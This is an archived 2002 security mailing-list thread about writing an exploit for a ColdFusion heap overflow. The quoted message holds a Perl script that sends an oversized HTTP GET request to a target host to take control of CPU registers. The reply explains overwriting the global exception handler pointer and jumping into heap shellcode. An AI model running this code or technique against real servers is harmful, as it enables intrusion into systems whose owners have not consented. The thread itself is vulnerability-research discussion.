Overwriting the exception pointers on the stack is crazy talk. The stack moves all around, and you'd never get the right one. However, there is a global exception pointer as well, which is used if it is set. Check out DDK-IIS.c and see the values they have for that, and try overwriting it. It actually works better if you do it without debugging the program, in my experience. Most people exploit heap overflows by overwriting that global exception handler pointer thingy (yes, this is what it is technically called) and then pointing the program's eip into the heap, where they've stuffed half a gig of nops and some crappy SP dependant win32 shellcode. -dave On Thu, 14 Nov 2002 11:31:10 -0000 "Gary O'leary-Steele" <garyo@sec-1.com> wrote: > Hi all, > > > I need some help with a subject I have trying to get my head round for > some time. I am attempting to write exploit code for the recent > coldfusion heap overflow discovered by eeye. I don't fully understand > heap overflows but here is where I'm at. > > I can control the following values within the following instruction, > > mov [ecx] , eax > > > where ecx and eax can be any value I specify. Thinking back to the > .asp chunked transfer overflow, many people talked about and > implemented exploits which overwrite the structured exception handler > to gain EIP. Due to the fact my area is stack overflows I started by > trying to overwrite the saved RET by specifying its location in [ecx] > and the required value in eax. However this just caused the program to > crash in a different place and the value in EBP was no where near > where it was in the mov [ecx],eax instruction. > > I am looking for the following; > > How is the exception handler overwritten ? is it in a static place > etc?? > > Papers or advice on exploiting this type of vulnerability. > > or any ideas using what I already have. > > The following is the code I am currently using to overwrite the values > in ecx and eax (ecx = 0x42424242 eax=0x41414141) > > > > #Coldfusion HEAP overflow > > if (@ARGV<1) {die "\nCold Fusion Heap Overflow. \n Usage \= > IP/host:Port e.g. Perl $0 www.target.com\n";} > use Socket; > ($host,$port)=split(/:/,@ARGV[0]);$target = inet_aton($host); > unless($port){$port = 80;} > > ################### > $len1 = "A" x 1000; > > $len2 = "B" x 1000; > > $len3 = "C" x 1000; > > $len4 = "D" x 1000; > ################### > > > $len5 = "E" x 119; > > > $len5 = $len5 ."BBBB"."AAAA". "e" x 175 ."n" x 175; > > > $len6 = "X" x 500; > > > $len = $len1 .$len2 .$len3.$len4.$len5.$len6; > > $getreq = 'GET /' . $len . '.cfm' .' HTTP/1.0'; > > > $padrequest = > $getreq. > "\r\n". > 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, > application/vnd.ms-powerpoint, application/vnd.ms-excel, > application/msword,*/*'. > "\r\n". > 'Accept-Language: en-gb'. > "\r\n". > 'Accept-Encoding: gzip, deflate'. > "\r\n". > 'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; > Q312461;.NET CLR 1.1.4322)'. > "\r\n". > 'Host: '. $host. > "\r\n". > 'Connection: Keep-Alive'. > "\r\n\r\n"; > > > > > @result =sendraw($padrequest); > print $padrequest; > print length($padrequest); > #print @result; > > sub sendraw { # this saves the whole transaction anyway > my ($pstr)=@_; > socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || > die("Socket problems\n"); > if(connect(S,pack "SnA4x8",2,$port,$target)){ > my @in; > select(S); $|=1; print $pstr; > while(<S>){ push @in, $_;} > select(STDOUT); close(S); return @in; > } else { die("Can't connect...\n"); } > } > > > Thanks in advance. > > Kind Regards > Gary > Sec-1 > >
This archive was generated by hypermail 2b30 : Thu Nov 14 2002 - 09:58:34 PST